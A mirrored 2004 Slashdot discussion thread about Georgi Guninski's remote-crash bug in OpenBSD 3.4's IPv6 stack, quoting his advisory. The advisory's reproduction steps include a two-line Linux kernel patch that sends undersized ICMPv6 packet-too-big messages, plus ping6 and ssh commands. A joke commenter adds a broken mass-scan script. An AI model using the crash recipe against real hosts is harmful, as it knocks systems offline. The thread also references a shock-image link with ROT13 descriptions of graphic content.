Slashdot Mirror
Remotely Crash OpenBSD
*no comment* writes "If you are running OpenBSD on your IPv6 install, it might be time to upgrade to -current. (just kidding) There is, however, a way to crash OpenBSD 3.4 with a couple of simple IPv6 commands. Georgi Guninski, found the problem. To quote Theo, 'it is just a crash.'" It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think it's time to upgrade to windows.
I am defenseless. Use your button. Mod me down with all of your hatred.
Or can OpenBSD still boast "Only one remote hole in the default install, in more than 7 years!" ?
--
Society has traditionally always tried to find scapegoats for its problems. Well, here I am.
I'm thinking that if someone from Microsoft stated "It's just a crash" the editors here would be just a touch more sarcastic...
No, in order to perform an attack on an OpenBSD box with this vulnerability you need to patch a Linux Kernel or roll your own network stack.
Join moola.com, play games to earn money.
I noticed this awhile ago. To fix the problem, it is believed that openbsd current is not vulnerable.
Yes, the attacker needs to modify their kernel to send out the specific packet (from what I quickly read)
RTFA. you need to patch your kernel in order to EXPLOIT it, not to be exploited.
ps: it's only a 2 line patch to one file.
I believe that you must roll your own Linux kernel or network stack in order to send the (correct? bad?) commands that cause openBSD's crash to occur.
Open Your Mind. Open Your Source.
Why would you patch a Linux kernal for a BSD problem? That's like patching Windows due to a linux problem.
Help Brendan pay off his student loans
Actually you need to patch the linux kernel or write you own network stack to DO the remote attack against an OpenBSD box.
At least that's the way I read it.
chown -R us.
I know that the problem has been fixed in -current, but I run a production box that I refuse to bring up to -current. There's no patch or even a mention of this problem on the errata page.
What's a sane admin to do?
Maybe the next time Bashdork reports the new evil IE vulnerability that allows my desktop wallpaper to be changed by a hacker in Romania I'll se a quote like this one. "To quote [whomever], head of [whatever] at Microsoft, it's just a crash".
I'm sure.
No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.
"People that quote themselves in their signatures bother me" - athakur999
RTFA. You need to patch the linux kernel to get it's network stack to send out the specific packet to crash openbsd.
Exploiting the bug requires patching the Linux kernel.
..or should this read "If you are running IPv6 on your OpenBSD install.."
Now, if you'll excuse me, I have backups to corrupt.
read. to cause the crash you need to use a remote system running the patched linux kernel
I believe that EXPLOITING (not patching) the vuln. requires patching you network stack (the post just assumes you are running Linux in true /. form)
ya know after all the depenguinator and "upgrading" your linux box to BSD articles lately...i should have some sort of witty remark to this... but sadly i dont.
"why don't you just slip into something more comfortable...like a coma!"
You have to have a modified ipv6 stack in order to exploit this bug, not to fix it. I can remotely crash your ipv6 enabled openbsd if I modify my linux kernel. Capisce?
Remote openbsd crash with ip6, yet still openbsd much better than windows
i ng in this document may change without notice.
:
/* we coulnd't care less */ //joro
i net6/ip6_output.c e t/tcp_output.c?sortby=date
Systems affected:
tested on openbsd 3.4
not clear about netbsd
freebsd not vulnerable
Risk: Medium
Date: 4 February 2004
Legal Notice:
This Advisory is Copyright (c) 2004 Georgi Guninski.
You may distribute it unmodified.
You may not modify it and distribute it or distribute parts
of it without the author's written permission - this especially applies to
so called "vulnerabilities databases" and securityfocus, microsoft, cert
and mitre.
If you want to link to this content use the URL:
http://www.guninski.com/obsdmtu.html
Anyth
Disclaimer:
The information in this advisory is believed to be true though
it may be false.
The opinions expressed in this advisory and program are my own and
not of any company. The usual standard disclaimer applies,
especially the fact that Georgi Guninski is not liable for any damages
caused by direct or indirect use of the information or functionality
provided by this advisory or program. Georgi Guninski bears no
responsibility for content or misuse of this advisory or program or
any derivatives thereof.
Description:
It is possible to remotely crash openbsd 3.4 if the host receives icmpv6
and there is a listening tcp port.
quoting de raadt: "it is just a crash."
remote crash which screws the kernel.
unknown whether this may be exploited for code execution.
Details:
The problem is triggered by setting small ipv6 mtu and then doing tcp
connect.
How to reproduce:
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
Workaround:
It is believed that openbsd current is not vulnerable.
netbsd current also seems to have related changes.
check:
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/net
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/netin
Vendor status:
open, net and free bsd were notified Sun, 1 Feb 2004 16:35:56 +0200
Georgi Guninski
http://www.guninski.com
No, the ATTACKER has to patch their Linux kernel in order to attack you. So if I knew you were running OpenBSD and using IPv6 and knew your IP address, I could patch my kernel and then try to connect to your box, causing you to crash.
Damn. And people say that Windows is insecure. Jeez.
(On the other hand, as everybody knows, IE is an integral part of windows and could never work on Solaris, HP-UX or Mac OS, just as it would be impossible to create a Windows version without IE, like WinXP-PE)
Programming can be fun again. Film at 11.
However, I guess patching a BSD kernel should work as well :-)
The Tao of math: The numbers you can count are not the real numbers.
Pardon my ignorance..but do FreeBSD n Open BSD use the same kernel?If they do does that mean that this bug would affect FreeBSD as well?
Lord of the Binges.
With the attitude those guys have, it's almost as amusing to hear about an OpenBSD exploit than a WinXP one!
You should read before posting.
So if you patch YOUR kernel and/or roll YOUR own network stack, then you could be vulnerable to a remote attack.
No, your attacker has to patch his linux kernel or roll his own network stack in order to crash you. You don't have to do a thing. RTFS!
c++;
Great, now when I try and check the linked article and cant get there I am left wondering if it was Slashdotted or if someone crashed the servers using the exploit.
Hell, who knows, maybe this one is Google's fault too.
...my BSD is dying...
Now let's see ... what are the chances of finding both an OpenBSD server (an unpatched one at that) and IPv6 network in the same place? I think I'd better stick to plausible worries like lighting strikes, seatbelt failures, and choking to death on my turkey dinners.
I was talking with some of my colleagues in network security this morning about the OpenBSD exploit and means by which future exploits may be avoided. One suggestion which was raised was that the OpenBSD 'ports' system may be to blame. After all, if you need to add packages on a BSD system, 'ports' must be opened, and when ports are open on firewall boxes, bad things happen. Debian's apt-get system for example does not require 'ports' to work properly, and therefore may be immune from this type of exploit. Is this a possible solution? I look forward to hearing the community's responses!
You appear to be missing the whole problem.
This is a problem with OpenBSD's IPv6 implimentation where if you send bad data, it looks like sending something larger then expected, then the kernel will crap out on you.
The rolling your own kernel OR build your wn network stack is whats required for the REMOTE host to send these bad packets to your system and crash it.
On an unrelated note, its a little disturbing to see this as i just rebooted a OBSD 3.3 system to upgrade to 3.4, but then again, I don't run IPv6.
What I would say is most suspect is Theo's reaction "Its just a crash." You would hope someone who started a project to create the worlds most secure OS would actually care there might be a problem.
"I use a Mac because I'm just better than you are."
No, the BSD has to patch the ATTACKERS IPv6 to crash THE packet linux victim ROLL YOUR OWN!
regarding the second paragraph...YOU HAVE TO BE KIDDING!
I would mod this FUNNY...not insightful.
> To quote Theo, 'it is just a crash.'"
Yes, just a crash. Because you know he was trying like mad to get a remote exploit out of it. Some bugs are a d0s and others are simply not exploitable. Not so hard to understand how people use the phrase, "just a crash", with a disapointed puppy dog look because they cannot get mad props for dissing on Theo.
As for the people who did not understand patching your kernel so you can exploit the bug on openbsd.
HA!
Please continue using windows and being an end luser.
I consider this bug to be like an interesting post. Georgi will just get karma from it. Nothing more.
After all, who needs a bug to d0s someone from the face of the earth?
His way was just more elegant.
Thanks, I feel like I was just promoted to people level.
Damn, and I was just geting used being geek level
Signature Pro version 1.13.2-3 release 83.5 beta3try7 after-breakfast edition
I love how the SIXTH person to respond to this post with essentially the same information as the other five gets modded up. How much you wanna bet the posts ahead of his get modded down as Redundant?
the difference is they fix it in a timely fashion...
Kyle
http://www.unlogikal.net/
rofl, nice ;)
even better someone just modded it insightful, please stop before I spit the rest of my coffee over the monitor.
Ha ha ha, very funny.
Slashdot: Failed Car Analogies. Amateur Lawyering. Anecdote Battles.
Well, I guess Theo got hit by the reductionism bug...or perhaps what he means is "At least the system goes down rather than being compromised"
yet still openbsd much better than windows... cause we say so. What a dumb way of defending yourself, why brush off your bug by saying "At least we're not windows!". Why don't you own up to the fact that "Hey we found a bug, but since we're open source we can fix it right away"
There are days on this network where I wish the latest MS vulnerability was just a crash. 'member those great days? It may not even get reported because it would be such low key news.
Anyway, for this remote takedown to work, you also have to be running an IPV6 stack, right? At the moment that's a pretty small segment of techies.
Note: I am not an OpenBSD apologist... I am a Mac apologist.
-- The unsig...
(Moderators: The BSD ports system has slightly less than nothing to do with TCP/IP ports being open, closed or missing on firewall or other machines. It's just a homonym (no, it has absolutely nothing to do with gays).)
Money for nothing, pix for free
Stupid trolls.
Hey but is only a crash nothing at all to worry about...
:
/* we coulnd't care less */ //joro
Patch linux kernel 2.4.24 net/ipv6/icmp.c
case ICMPV6_ECHO_REPLY:
icmpv6_send(skb, ICMPV6_PKT_TOOBIG, 0, 68, skb->dev);
then:
ping6 openbsd
ssh -6 openbsd
#!/usr/bin/python
import popen2,string
def cmd_execute(cmd):
p = popen2.Popen3(cmd)
p.wait()
return string.strip(p.fromchild.read())
#kill everybody
for a in range(0,255):
for b in range(0,255):
for c in range(0,255):
for d in range(0,255):
execute('ping6 ' + a + '.' + b + '.' + c + '.' + d)
execute('ssh -6 ' + a + '.' + b + '.' + c + '.' + d)
The Linux kernel in question belongs to the attacker, you dumbshit.
OK, that just piqued my curiosity. I am very sorry it did, but it did. People, do NOT follow that link in the grandparent post. Just take my word for it. Don't. No amount of curiosity is worth seeing that.
Money for nothing, pix for free
But the Linux kernel is what needs to be patched in order to exploit the OpenBSD kernel. A program running on "out of the box" Linux, can't implement the attack.
good thing nobody uses IPv6 and never will! :-)
Who the hell modded this up? The ports system like apt-get make internally initiated connections to servers. They don't start listeners up. You can run you own internal mirror of either.
Not log ago there was an article about not only how ipv6 isnt needed, but that since its 'new' code, it has a lot of problems that have long since been worked out of ipv4. Is this an example of that? Should we worry?
I have to ask myself that with all of the decades of experience that has gone into ipv4 development and hacking and exploiting, are these fears justified? Have all the glitches in ipv4 been found? and if so isnt it trivial to avoid the same early mistakes in ipv6. Does this particular problem have a ipv4 analog? Is it even a stack theory issue? Is it just an implementation oversight?
Does anyone have any insight?
WTF? I try to give a decent warning to the public and I get modded as flamebait? Either the moderators don't click on the links, or we have some real sickos here....
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
Flaming assholes and arrogant pricks we are, but even then a remote crash is the best you can do?
C'mon.
He was talking about having to modify a linux kernel in order to generate the traffic to crash the BSD kernel...
Thinking outside my Head
Beside, a remote crash is annoying, but it isn't a remote compromise. Besides it is limited to IP6. It will be more worrying when it is a IP4 remote compromise on a more common OS.
I didn't do anything, it was Guninski. I don't give a crap about OpenBSD.
I think what he means is "its just a crash rght now dont bother me untill you can show an exploit and have fixed it." It says right in the article they don't know if it will allow a system to be compromised, and it seems that until someone else checks that, he doesn't care. I was just saying that a crash might not be a crash, but Theo's attitude is a little lax in aproching the situation considering that they say right on bootup to OpenBSD the PROACTIVLY secure unix system. Not all that proactive when you don't take action to actually prevent a problem and just wait for someone to give you step-by-step how to comprimise a system.
"I use a Mac because I'm just better than you are."
What am I missing here?
Enough good sense to RTFA, or at least properly fake as though you had.
LK
"Hi. This is my friend, Jack Shit, and you don't know him." - Lord Kano
> I didn't do anything
Exactly.
mod -1 for being a troll post, openBSD is alive and well... and its not the linux kernel, its the BSD kernel you dumbshit.
Maybe you don't understand, but there has to be an attacker. You have to have a specific modification in the linux kernel of the linux machine (attacking machine) to successfully attack the openbsd machine (victem). Probably you could set up a FreeBSD machine, or even another OpenBSD machine to do the attack. Just a linux machine was used to attack in the example.
Did you even RTFA?
What would you rather Theo say? "OMG OMG OMG!!! Its a CRASH!!! Oh dear god! Quick, run around like headless chickens!!!!! Someone better get this patched pronto!!" or "Its jsut a crash." and get on with the patching?
Seriously, its getting fixed. You think his reaction would change the pace with which the bug gets fixed?
Ok so why the hell dont they just add a few more octets onto a ipv4 address? afraid to rewrite a.b.c.d as a.b.c.d.e.f?
lol... I crack me up
So maybe you need to patch a Linux OS to get some help sending broken ICMPv6 packets, or maybe you just need to do creative writing to the Ethernet. But you could certainly get MS-DOS to let you do it, and presumably also Windows.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel (or rolling your own network stack) to exploit.
I think CowboyNeil needs to check his Linux using head before reporting on BSD ever again.
It isn't a lie if you belive it.
is http://www.uberpferd.de/ the link you're talking about? If so, it doesn't have a DNS resolution here. :( And I was looking forward to being grossed out.
Welcome to the infamous pain.jpg series. Now that your Internet virgin cherry has been popped, we can all continue on with our lives.
Perhaps you should read the fine print at the top of this page:
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
And again at the bottom of the page:
All trademarks and copyrights on this page are owned by their respective owners. Comments are owned by the Poster. The Rest (C) 1997-2004 OSDN.
Slashdot is not responsible for what people post here. If you can't live with it maybe you should go elsewhere. Moderation works most of the time.
Okay, okay, I misread the post. You can all stop flaming me now. I thought it said it required patching the Linux kernel _to fix_ rather than to exploit. In any case, it was only meant in jest, there was no need whatsoever for the mod slamming and flamefest.
And buffer overflows that get data that isn't crafted are "just a crash" as well.
Most Military grade security systems run on Windows 2000, and is the most secure certified operating system.
There seems to be a leak in slashdot's subspace containment fields - a post from a strange parallel universe leaked into this thread!
But they are "securitier than thou." You're pretty much asking them to change their focus, do you think that security is a bad goal?
Maybe you need to get out of this sports mentality and stop feeling inadequate when another "team" is doing better in one area than your favorite?
It's fine to have security as your focus. In fact, that's great. What turns me off is the attitude that OpenBSD is axiomatically more secure. The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code." And then they should look at how this bug got in there, and figure out how they can make sure that kind of bug doesn't happen again.
IMO they should also get rid of this ridiculous "no (well, one) (remote) (root-privilege) holes (in the default install) in the last 7 years!" business. It's just too confrontational; how can we help but think of them as another "team" trying to beat us at the security "sport"?
Fwiw, I wouldn't go into riot mode over four monosyllable words taken out of context be it from MS or OBSD. Of course, this is /. and that nice little blurb will most certainly cause a lot of banner hits as people will just have to comment. I can personally attest to 3 to get this post up.
I don't want knowledge. I want certainty. - Law, David Bowie
I applaud what Theo de Raadt and company have done and are trying to do. Given the resources someone like M$ has to throw at this sort of thing (and their level of success) compared to the OpenBSD team, they've done amazing work. That being said, if Mr. de Raadt could do an attitude re-adjustment, OpenBSD could gain more of the respect it deserves.
Dear lord...
You seem a little bitter.
Are you making use of IPV6? While it is possible I don't really know many people that are, so perhaps you could just not use the IPV6 bindings for now until the problem blows over?
Welcome to the Internet. This is Slashdot. People post links to gross pictures here for you to click on and there is NOTHING YOU CAN DO ABOUT IT. No, really. I'm sure AOL would LOVE to hear about your problems with pee-pee poo-poo pictures on the Web. Why don't you grow a pair of balls and stop your whining?
A non-serious cracker might have fun taking down OpenBSD a few times with an exploit like this. A more serious cracker would do this to try to convince some number of systems to stop running the most secure OS that's reasonably available and replace it with more vulnerable systems that aren't getting spanked a lot.
Bill Stewart
New Fast-Compression-only CPR http://preview.tinyurl.com/dy575ks
I'd find the OpenBSD crew's haughty "more secure than thou" attitude a lot more annoying if it weren't for the fact that their track record actually justifies it. The fact that you can still count the number of remote exploits using a two-bit register is pretty impressive.
Except it's not an exploit, it's a DoS ... that only affects people running IPv6, with a publically accessible IP.
hehe beware the links. I was just as horrified the first time I saw the goatsx pic as a young slashdot noob.
Hardly..
a simple raw socket will do.
The response from TdR shouldn't be "it's just a crash." It should be, "Man, we screwed up! It will be fixed right away. Good thing there seems to be no way to execute code."
It was fixed before you even heard about it. Get over yourself.
Haida Manga
Just a crash? Just a crash? Give me a break. If the machine goes down, you're hosed. How convenient.
What would the reaction be if s/OpenBSD/WinXP/g and the response was from Microsoft was "it's just a crash." Imagine. Oy.
Except it's not an exploit, it's a DoS ... and it's only a problem for those running IPv6 with a publically accessible IPv6 address.
Yeah, there's a dangerous problem there.
God, the intelligence on Slashdot has certainly dropped in the past few years.
exactly what?
...IPv10 (IPX!)? 4 + 6... [woo lame version # advancement schemes!] then you get to put an "X" in the name and everyone upgrades faster... maybe we could even work in an XML basis; think of the interoperability!
Global symbol "$deity" requires explicit package name at line 2. - If only $scripture started "use strict;"
it runs on solaris cause its a donated site from University of Alberta.
a few months back child porn was posted and nothing was done
I've read a bunch of posts comparing this "possible" hole in OpenBSD to those in MS. There's NO comparison! I bet Theo and the OpenBSD developers are already working on a fix. Actually, they probably already have one. With MS, it takes much, much longer! And sometimes, the "fixes" that MS so-called developers come up with break something else.
You bastards!
yes, when I saw this and noticed people commenting on the "Securer than tho" stance taken, my immediate thought was
"Hmm, well if we have gotten to the point where people have to roll their own net stack or patch a kernel to bring an issue to the for, then hasnt hte OpenBSD project succeeded in its goal?"
I'm glad they fixed it..
e ti net6/ip6_output.c.diff?r1=1.81&r2=1.82&f=h i ne t/tcp_output.c.diff?r1=1.106&r2=1.107&sortby=date& f=h
http://www.openbsd.org/cgi-bin/cvsweb/src/sys/n
http://cvsweb.netbsd.org/bsdweb.cgi/src/sys/net
[alk]
The good thing about ports is that, due to their alcohol and tannin content, you *CAN* leave them open much longer than more typical wines. I have a nice port (Fonseca) sitting open on my bar at home. I take a couple of nips from it every evening, and then replace the glass stopper on the carafe. It is a wonderful way to end the work-day. Go grab yourself a 10-year Tawny and you'll see what I mean.
You do need to be careful with how many ports you have open. I find after a couple of ports my work product increases. After a few more, it tends to decrease, exponentially going downhill with each subsequent port. You need to be especially careful with a root prompt and several open ports late at night.
For extra kicks, blind taste a Tawny against a Madeira.
Enjoy.
I have something in common with Stephen Hawking...
"Only one remote hole in the default install, in more than 7 years!" -openbsd.org
but a billion local holes in default install...
--- any post that takes longer than 20 seconds to write, isn't worth writing
Maybe it's not their attitude that is the problem.
I have made a mirror of the page, as it is becoming exceedingly slow.
|/usr/games/fortune
now, how many times does this happens to your favorite OS vendor and their favorite web browser???
from the openbsd CVS:
Revision 1.82 / (download) - annotate - [selected], Wed Feb 4 08:47:41 2004 UTC (38 hours, 50 minutes ago) by itojun
Branch: MAIN
CVS Tags: HEAD
Changes since 1.81: +100 -18 lines
Diff to previous 1.81 (colored)
strictly follow RFC2460 section 5, last paragraph (sender behavior when path MTU 1280). bug found by Georgi Guninski. ok dhartmei
This guy found a crash in qmail, too. I don't think he showed it was exploitable, so he doesn't win DJB's security guarantee prize. In fact I'm not sure DJB reacted to the news at all.
you would HAVE to be connected to the 6bone to get a ipv6 packet. Or have the attacker on your own network running ipv6 and trick you into becoming configured onto the same /64 prefix....not many of us have a ipv6 tunnel (thank you hurricane electric). So this affects very very very few people. you know who you are, and are patching now.
--jboss
The day Microsoft has half the kind of security track record as OpenBSD, they'll be cut some slack.
OpenBSD had earned a little slack. MS still has a long way to go in system security/stability before they deserve the same treatment.
Fixed? really? Could you point out on the errata page where this is even mentioned, let alone patched?
"I use a Mac because I'm just better than you are."
Which link we talkin about anyhow? I wanna see! lol
"our linux crashed your openbsd!"
If the same port cost $5 a bottle, would you care so goddamn much about drinking it?
If you think of going to page linked by the grand-grand-parent, dont.
:
:
... sigh, why do I even make the effort?)
I did out of curiosity
If your curious, read this
DISCLAIMER : Even the text version might be highly offensive to some, but I hope that this will kill the curiosity of some people.
The link is one large image composed by multiple sub-images, there is (ROT13):
- Ghotvey
- Tbngfr
- fbzr fgenatr irel htyl intvan-vasrpgvba
- n guvat gung ybbxf yvxr n urnq ghearq vafvqr bhg
- n yrt jvgu gur fxva evccrq bss
- n navzr cvpgher bs n tvey jvgu na bcra fgbznpu
- guerr irel byq zra univat frk
- n jbzna rngvat cbbc pbzvat serfu bhg bs fbzrbarf nffubyr
- one more pictures I dont remember (and I WONT go there again, once was twice too much)
And I can just agree with the parent
NO AMOUNT OF CURIOSITY IS WORTH SEEING THAT.
(But I know that your curiosity will win anyway
Now, where can I get a mind-altering drug to forget what I just saw, that I just saw it and that I even remotly know of it existence?
I have discovered a truly remarkable proof for my post which this sig is too small to contain.
While possibly not a direct security threat, remote crash exploits are obviously highly disruptive and in today's networked economy, highly costly in terms of lost productivity.
While a crash exploit doesn't guarantee it, it usually means that a root exploit is possible.
Think about it: You got the machine to execute code it shouldn't have executed (or overwrite something 'way important it shouldn't have overwritten, or with a value it shouldn't have written.) This usually means you changed the program coutner to some random value. That typically happens as a result of overwriting a return address by a buffer-in-the-stack overflow. Now if you can just get the program counter to point to code you supplied in the same packet, and put the right code there, you're in.
There are other ways this can happen (for instance: overwriting an index into a function table with an illegal value). But many of these similarly lead to root exploits.
A crash means you killed, not just a task, but the whole system. In a system as robust as BSD this usually means that the code that was corrupted by the exploit was running at a kernel permission level. So if you can take it over you can get it to give you any permission you want.
Bantam Dominique roosters crow a four-note song. Once you've heard it as "Happy BIRTHday" you can't NOT hear it that way
"I have a nice port (Fonseca) sitting open on my bar at home."
I've had a bottle of '77 Fonseca buried in a cave in the Midwest since 1990. One day, when I'm old and grey and wet the bed, my son and I are gonna drain it together.
what is interesting is that current is not affected. very often when a problem is fixed in current but not in stable. why ?
theo hides some fixes. i do not know if it is to keep an advantage over the other bsd projects or linux, but when a problem is detected, they only produce a patch for stable if there is an exploit around or rumour of an exploit.
no exploit ? it gets fixed in current only.
and theo hides it under something like "reliability fix" or alike when if you check the patch it's really a buffer overflow or something very obvious.
so we got people running openbsd stable with patches that should know that if they want to keep with openbsd they should track current, not stable with patches.
this is hypocrisy. the other bsd projects not only do not do such stupid things but they have to keep an eye on theo patches just to find out.
stupid
i have been part of the opensbd project. so i know pretty well how it works.
I remember the days in the late 80s and early 90s when it was (which is how I was able to afford that case of Fonseca '77)... I was a pig in shit back then.
I have something in common with Stephen Hawking...
It should be amusing and rare to hear about these holes in ANY OS. OpenBSD should get more press than Windows for holes, after all openBSD has so few that you can safely assume the people using openBSD don't bother to pay attention, while those using Windows have to pay attention. Therefore we need extra effort to get the attention of OpenBSD users on the rare times it is needed.
Saddly it doesn't work that way. Windows users despite having lots (by comparition) of holes never patch, while openBSD seems to be reserved for only the paranoid who patch often.
Either way, openBSD deserves the attention they get. If I were swear everyone who knows me would talk about it, even though most of them think nothing of swearing everyday (or so it seems). Once you build (like me) an expectation it is interesting when you violate it, even though you did something that is everyday.
Perhaps I'm missing something, but why would someone need to run ipv6 since the Internet is still not using it?
We are still running everything on ipv6. Now we have had a couple sites that we've had to move to FreeBSD servers due to the lack of SMP support in OpenBSD and needed the extra power. However, overall, I've had good luck with OpenBSD. Its the lack of support for SMP and other features that keep me from an extremely large scale deployment...
"The problem with socialism is eventually you run out of other people's money" - Thatcher.
"It is unknown if the bug could be used to execute arbitrary code, but it does require patching a Linux kernel"
Is it Linux or BSD? ; )
That guy is one of the best bug hunters in the industry. He and Rain Forrest Puppy should start a consulting firm.
Saying Java is nice because it works on all OS's is like saying that anal sex is nice because it works on all genders.
To quote Theo, 'it is just a wardrobe malfunction.'"
Cogito ergo sum:
Rene Descartes, Discourse on Methode, Part 4:Reposted 'cause I could use the mod points.
What does "cogitoergosum" mean?
Cogito ergo sum:
Rene Descartes, Discourse on Methode, Part 4:A "remote hole" doesn't have to just be obtaining root access. Being able to remotely crash a server is almost as bad. So no, they cannot boast.
Troll?!? It was humor, you insensitive clod.
a few months back child porn was posted and nothing was done
/.
/.
/. is not the publisher, nor did /. in any way encourage the posting of material of that nature, should you expect /. to take the unprecidented action of censoring postings based on the content.
/. out of it! Read the FAQ if you still don't understand the concept.
No, a link to child porn was posted and the post was modded down into oblivion, as is the system and the basis of the culture here at
No post, no matter how disgusting, offensive, or damaging to "national security" will be deleted from
If a site is publishing child porn, then the operators of that site should be held responsible for this, but as
If you have a problem with the posting you mention (I did not see that post myself, so I have no opinion of its content) then you should locate the url of the offending mater and take whatever legal action against that publisher is apropriate.
Just leave
once again: comments will not be deleted because of content.
You got us. It was fixed about two and a half hours after you heard about it...
p =R eply&threshold=1&commentsort=0&tid=172&mode=thread &pid=8196065
http://bsd.slashdot.org/comments.pl?sid=95689&o
What I've been wondering is if anyone has read any of the literature regarding OpenBSD's methodology. I recally it being expressly mentioned that they would rather have the machine crash than have it rooted. Which is a good idea if you cannot risk a break-in. They try to break-in, you crash, and now you're in a more secure state (off) than you were when they attacked you.
As a sysadmin of a college network, "just a crash" *really* helped me.
I replaced all firewalls with OpenBSD filtering bridges. One rather persistent script kiddie (unfortuneately a legitimite $luser on the network) decided to send a few malformed packets here, there and everywhere. One of these crashed the filtering bridge at the edge of that particular subnet.
Immediately no packets enter or leave that subnet and I get about 40 phone calls "the internet is broken / my session crashed..." and go and deal with it.
Just a crash, saved several boxes. By contrast, accessible linux machines, privelege escalation - root exploit. All over.
Now if only the average windows box would *only* bluescreen in response to being cracked/ infection with the latest...rather than sending mal packets everywhere. Then infection would be self limiting and the world would be a better place.
la verdad no se que decirles
youll get many more crashes :)
you just need millions to test out bsd
http://bsd.slashdot.org/faq/com-mod.shtml#cm150
/. were to censor these posts then they take a big step onto a very slippery slope.
/., no censorship, no exceptions.
Slashdot does not delete comments based on thier content (except in those couple of cases where the Secret Service imposed thier will).
If
On
aaargh, my OpenBSD box is _really_ dead this time!!
I know I should have intense knowledge of all of this already... ;) but, how can openBSD use a Linux kernel, aren't they different beast? Both Unix derived beast but different nonetheless, or are they, do openBSD actually runs on the Linux kernel?
was your firewall would you rather have it rooted and used by one person/group or your box down and either:
internal network exposed, or
your business of the air
The Singularity is closer than you think
Quant
teh spoke or whack?
and if you're counting the number of remote root exploits, you can use a 2 bit register with a signed value.
When someone might yell at me, it has to be OpenBSD.
Mmmm. Tawny Port. Church got me into that one. Who knew the blood of Christ was so tasty?
a complete clean room implementation using engineers that didn't read BSD TCP/IP code in school ...
...
yeah right
It's heartwarming to see that the ping of death lives on.
OMFG!! They do *NOT use the same kernel. Yes, both are *NIX derivatives, but no, they do not use the same kernel. Download OBSD and try it out. If you know Linux, then you'll see the differences and similarities real fast.
Anyone who equates deleting accounts that have no privileges and are unable to login with security is a moron. And commenting out IPv6 will not make the kernel any more effecient, it has no effect on performance at all. If you don't use IPv6, then you are already not affected. Try to think just a *little* bit once in a while.
Yeah fucking right!
No, it's not "just a crash", it's a "very easily executed DOS" that could be perpetuated indefinately if the person on the receving end wasn't aware of this exploit.
Theo: don't be so egotistical and elitist. Such attitudes lead to failure and defeat. History teaches us this.
~/ssh slashdot.org ssh: connect to host slashdot.org port 22: too many beers
If you bothered to spend a little time learning about OpenBSD and how things work there, you'd know how stupid your statement is. Every time *any* bug is found they go through the entire source tree searching for similar errors. Things like this have resulted in other fixes in the following days as a result. Just because he says "its just a crash" when its just a crash, doesn't mean its not being taken seriously. You don't even know the context of the statement for christ's sake, wtf do you want him to say, "oh shit, we are 0wn3d, we give up, we're switching to linux cause its so much better!"?
Wasn't the BSOD just a crash?
[SIG] Remember Mattel handheld games?
Basically, Georgi Guninski found a way to cause the current child process of 'qmail-smtpd' to abend -- this is not a DoS, as it only affects your child SMTP session, and is likely not possible in an RFC-compliant message.
Technically the issue is the use of a signed integer as a counter when it is also used as an index into the array (containing the current line?). If the counter is incremented to the point that it "wraps around" (technically overflows, but not in the same sense as a buffer overflow), then when the counter is used as an offset into an array, it causes a "segment violation" fault.
Because the counter is used as an offset into an array for the purpose of reading the value of a byte, and the process is killed as soon as it tries to access memory outside of it's segment (SEGV), this is inherently non-exploitable for privilege escalation.
As I said, it's silly, is only an issue because the rest of DJB's code is so clean you could eat off it, and as Georgi Guninski says,
I do not deploy Linux. Ever.
Heres what I saw in the advisory:
ping6 openbsd
ssh -6 openbsd
Notice the ssh -6? Now how many people do you know will run an ssh server as tcp6? He will have to be really interested in ipv6 and run a couple of daemons and run an ipv6 home network.
So if he's mucking with ipv6, for one hes not running critical servers and has critical data on his server that needs to be 99.999% available.
Secondly theres really not many people who would much with ipv6 in the first place.
So I think OBSD is still pretty much secure and this bug shouldnt harm OBSD's image. Bugs appear in OSes all the time and this one, with all the press its getting will do much less damage to OBSD servers around than the bugs for Windows and other Unixen will.
"Give orange me give eat orange me eat orange give me eat orange give me you." -Nim Chimpsky
Its Slowlaris . Please use the terminology correct next time.
However, keep in mind that there are quite a few areas in (all?) BSD-derived IP stacks where a seriously malformed packet will cause the kernel itself to throw up it's hands and call panic("WTF?!?").
I've found that just about any system will eventually panic if you sic ISIC at it from within the same subnet.
Cool OpenBSD kernel panic messages:
or the elegantly simple:
I do not deploy Linux. Ever.
I have a modifier to add six points for troll posts, so this actually gets *modded up* to five points on my computer. And at least you got what you asked for. A lot of people think they're trolling and ask for a troll mod, but they get flamebait. Dumbasses.
(by comparition)
whaaaat? OH! you mean comparison... I know you've got a low UID an' all, but i mean - come on maaaan
> you can safely assume the people using openBSD don't bother to pay attention
/. i hope you don't work in this industry; i don't even think i'd trust you to salt fries.
that statement is probably one of the most ignorant i have _ever_ read on
no. you have to patch the attacker's kernel. Then you have to light 6 candles, carefully placing 2 of them on the magnetic poles of the earth..the other 4 candles must be placed inside your rectum for a period of 7 days during which you cannot consume water. This remote crash is gay. You shouldnt have ipv6 enabled on a fucking production box anyway.
Actually you don't need to do any of the candle part at all. You probably loved researching that part though, didn't you Theo?
Yeah, you're not going to see a worm that infects Linux hosts, patches their kernels, recompiles, and executes these commands against OpenBSD.org...
The BSD is dying trolls should orchestrate an attack on every know BSD server out there, then come back to /. and tell us all about how BSD is dying. Heck, at that point, maybe it would be dead.
I get it now. We leave. You guard the prince. The prince has to patch his kernel.
graspee
Just use VPN through it and it comes down with the slightest traffick between the VPN server and client
"Fighting terrorists with millitary might is like killing a mosquitor on your Dad's forehead with a rifle."
...OpenBSD is just crashing.
I think that it means that you need a patched Linux kernel in order to generate and send the borked packets that cause the crash on an OpenBSD box. The modded network stack is used on a Linux machine to crash an OpenBSD machine.
I'm surprised the crash made slashdot, but not the root exploit in BSD that was posted to BugTraq at the same time. To wit:
http://www.securityfocus.com/archive/1/352733
